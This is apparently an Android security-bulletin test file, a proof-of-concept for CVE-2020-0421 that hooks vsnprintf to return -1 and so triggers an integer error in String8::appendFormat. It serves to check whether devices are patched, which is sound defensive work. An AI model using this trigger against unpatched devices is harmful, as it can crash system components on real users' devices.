hostsidetests/securitybulletin/securityPatch/CVE-2020-0421/poc.cpp

/**
 * Copyright (C) 2020 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <dlfcn.h>

#include "utils/String8.h"

#define VULNERABLE_STRING "Q0bRTMaNUg"

typedef int (*vsnprintf_t)(char *const, size_t, const char *, va_list);

static vsnprintf_t fptr = nullptr;

// For CVE-2020-0421 to be reproducible, the vsnprintf has to return a negative
// value. This negative value is added to size_t resulting in runtime error.
// Getting vsnprintf to return -1 is tricky. The issue produced in fuzzer was
// due to the call str1.appendFormat("%S", "string"). Using wide char string
// format specifier for regular string is not a reliable way to produce the
// issue. As from N1570, "If any argument is not the correct type for the
// corresponding conversion specification or If there are insufficient arguments
// for the format, the printf behavior is undefined." The below intercepting
// function offers a simple way to return negative value.
int vsnprintf(char *const dest, size_t size, const char *format, va_list ap) {
  if (!strcmp(format, VULNERABLE_STRING)) {
    return -1;
  }
  return (*fptr)(dest, size, format, ap);
}

int main(void) {
  fptr = reinterpret_cast<vsnprintf_t>(dlsym(RTLD_NEXT, "vsnprintf"));
  if (!fptr) {
    return EXIT_FAILURE;
  }
  android::String8 str1{VULNERABLE_STRING};
  str1.appendFormat(VULNERABLE_STRING);
  return EXIT_SUCCESS;
}